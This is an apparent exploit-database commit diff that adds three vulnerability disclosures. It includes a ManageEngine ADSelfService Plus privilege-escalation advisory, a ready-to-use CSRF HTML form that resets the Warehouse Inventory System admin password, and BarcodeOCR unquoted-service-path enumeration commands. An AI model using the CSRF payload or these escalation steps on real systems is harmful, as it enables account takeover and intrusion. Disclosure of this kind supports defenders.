DB: 2020-08-11

3 changes to exploits/shellcodes

BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path
Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)
ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)

exploits/java/webapps/48739.txt

@@ -0,0 +1,142 @@
+# Exploit Title: ManageEngine ADSelfService Plus 6000 – Unauthenticated Remote Code Execution
+# Date: 2020-08-08
+# Exploit Author: Bhadresh Patel
+# Vendor link: https://www.manageengine.com/company.html
+# Version: ADSelfService Plus build < 6003
+# CVE : CVE-2020-11552
+
+This is an article with PoC exploit video of ManageEngine ADSelfService
+Plus – Unauthenticated Remote Code Execution Vulnerability
+
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+Title:
+====
+ManageEngine ADSelfService Plus – Unauthenticated Remote Code Execution
+Vulnerability
+
+CVE ID:
+=======
+
+CVE-2020-11552
+
+Date:
+====
+08/08/2020 (dd/mm/yyyy)
+
+Vendor:
+======
+As the IT management division of Zoho Corporation, ManageEngine prioritizes
+flexible solutions that work for all businesses, regardless of size or
+budget.
+
+ManageEngine crafts comprehensive IT management software with a focus on
+making your job easier. Our 90+ products and free tools cover everything
+your IT needs, at prices you can afford.
+
+From network and device management to security and service desk software,
+we're bringing IT together for an integrated, overarching approach to
+optimize your IT.
+
+Vendor link: https://www.manageengine.com/company.html
+
+
+Vulnerable Product:
+==============
+ManageEngine ADSelfService Plus is an integrated self-service password
+management and single sign on solution. This solution helps domain users
+perform self-service password reset, self-service account unlock, employee
+self-update of personal details (e.g., mobile numbers and photos) in
+Microsoft Windows Active Directory. ADSelfService Plus also provides users
+with secure, one-click access to all SAML-supported enterprise
+applications, including Office 365, Salesforce, and G Suite, through Active
+Directory-based single sign-on (SSO). For improved security, ADSelfService
+Plus offers Windows two-factor authentication for all remote and local
+logins. Administrators find it easy to automate password resets, account
+unlocks while optimizing IT expenses associated with help desk calls.
+
+Product link:
+https://www.manageengine.com/products/self-service-password/?meadsol
+
+Abstract:
+=======
+A remote code execution vulnerability exists in ManageEngine ADSelfService
+Plus Software when it does not properly enforce user privileges associated
+with Windows Certificate Dialog.
+This vulnerability could allow an unauthenticated attacker to remotely
+execute commands with system level privileges on target windows host. An
+attacker does not require any privilege on the target system in order to
+exploit this vulnerability.
+
+Report-Timeline:
+=============
+27/02/2020: Vendor notified
+27/02/2020: Vendor response
+28/02/2020: Marked duplicate
+11/03/2020: Patch released
+23/03/2020: Vendor responded regarding patch release update
+26/03/2020: Patch tested and found that it partially fixed the issue.
+Reported back to the vendor.
+18/04/2020: Shared updated report with new PoC
+22/04/2020: Vendor acknowledged the issue
+24/07/2020: Patch released (
+https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6003-release-faceid-support
+)
+08/08/2020: Public disclosure
+
+
+Affected Software Version:
+=============
+< ADSelfService Plus build 6003
+
+Exploitation-Technique:
+===================
+Remote
+
+Severity Rating (CVSS):
+===================
+9.8 (Critical) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
+
+Details:
+=======
+A remote code execution vulnerability exists in ManageEngine ADSelfService
+Plus Software when it does not properly enforce user privileges associated
+with Windows Certificate Dialog.
+
+This vulnerability could allow an unauthenticated attacker to remotely
+execute commands with system level privileges on target windows host. An
+attacker does not require any privilege on the target system in order to
+exploit this vulnerability.
+
+ManageEngine ADSelfService Plus thick client enables a user to perform
+self-service like password reset, self-service account unlock, etc by using
+self-service option on windows login screen.
+
+Upon selecting this option, ManageEngine ADSelfService Plus thick client
+software will be launched which will connect to a remote ADSelfServicePlus
+server to facilitate the self-service operations.
+
+A security alert can/will be triggered when “an unauthenticated attacker
+having physical access to the host issues a self-signed SSL certificate to
+the client”. Or, “a (default) self-signed SSL certificate is configured on
+ADSelfService Plus server”.
+
+“View Certificate” option from the security alert will allow an attacker
+with physical access or a remote attacker with RDP access, to export a
+displayed certificate to a file. This will further cascade to the standard
+dialog/wizard which will open file explorer as SYSTEM.
+
+By navigating file explorer through “C:\windows\system32\”, a cmd.exe can
+be launched as a SYSTEM.
+
+*PoC Video:* https://www.youtube.com/watch?v=slZRXffswnQ
+
+01:00 to 05:30 : Setup the environment
+05:30 to 06:34 : Exploitation
+
+Credits:
+=======
+Bhadresh Patel
+
+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+Regards,
+-Bhadresh

exploits/php/webapps/48738.txt

@@ -0,0 +1,24 @@
+# Exploit Title: Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)
+# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
+# Date: 2020-08-09
+# Vendor Homepage:  https://oswapp.com
+# Software Link: https://github.com/siamon123/warehouse-inventory-system/archive/master.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro + XAMPP | Python 2.7
+# CWE-352: Cross-Site Request Forgery (CSRF)
+# CVSS Base Score: 7.5 # Impact Subscore: 5.9 # Exploitability Subscore: 1.6
+# Vulnerability Description:
+#   Cross-Site Request Forgery (CSRF) vulnerability in 'edit_user.php' webpage of OSWAPP's 
+#   Warehouuse Inventory System v1.0 allows remote attackers to change the admins password
+#   via authenticated admin visiting a third-party site.
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://<IP_ADDRESS>/edit_user.php?id=1" method="POST">
+      <input type="hidden" name="password" value="Boku123!" />
+      <input type="hidden" name="update&#45;pass" value="" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/windows/local/48740.txt

@@ -0,0 +1,34 @@
+# Exploit Title: BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path
+# Discovery Date: 2020-07-31
+# Response from BarcodeOCR Support: 08/03/2020
+# Exploit Author: Daniel Bertoni
+# Vendor Homepage: https://www.barcode-ocr.com/
+# Version: 19.3.6
+# Tested on: Windows Server 2016, Windows 10
+
+# Find the Unquoted Service Path Vulnerability:
+
+C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
+
+BarcodeOCR	Auto	BarcodeOCR	C:\Program Files (x86)\BarcodeOCR\Service.exe
+
+# Service info:
+
+C:\sc qc CodeMeter.exe
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: BarcodeOCR
+        TIPO               	  : 10  WIN32_OWN_PROCESS
+        TIPO_AVVIO         	  : 2   AUTO_START
+        CONTROLLO_ERRORE   	  : 1   NORMAL
+        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\BarcodeOCR\Service.exe
+        GRUPPO_ORDINE_CARICAMENTO :
+        TAG                	  : 0
+        NOME_VISUALIZZATO         : BarcodeOCR
+        DIPENDENZE       	  :
+        SERVICE_START_NAME : LocalSystem
+
+
+# Exploit:
+
+A successful attempt to exploit this vulnerability could allow to execute code during startup or reboot with the elevated privileges.

files_exploits.csv

@@ -11138,6 +11138,7 @@ id,file,description,date,author,type,platform,port
 48696,exploits/windows/local/48696.py,"Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)",2020-07-26,"Eduard Palisek",local,windows,
 48719,exploits/windows/local/48719.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
 48735,exploits/windows/local/48735.txt,"CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path",2020-08-06,"Luis Martínez",local,windows,
+48740,exploits/windows/local/48740.txt,"BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path",2020-08-10,"Daniel Bertoni",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42979,3 +42980,5 @@ id,file,description,date,author,type,platform,port
 48734,exploits/php/webapps/48734.txt,"Victor CMS 1.0 - 'Search' SQL Injection",2020-08-06,screetsec,webapps,php,
 48736,exploits/hardware/webapps/48736.txt,"All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)",2020-08-07,LiquidWorm,webapps,hardware,
 48737,exploits/php/webapps/48737.txt,"Daily Expenses Management System 1.0 - 'item' SQL Injection",2020-08-07,screetsec,webapps,php,
+48738,exploits/php/webapps/48738.txt,"Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)",2020-08-10,boku,webapps,php,
+48739,exploits/java/webapps/48739.txt,"ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)",2020-08-10,"Bhadresh Patel",webapps,java,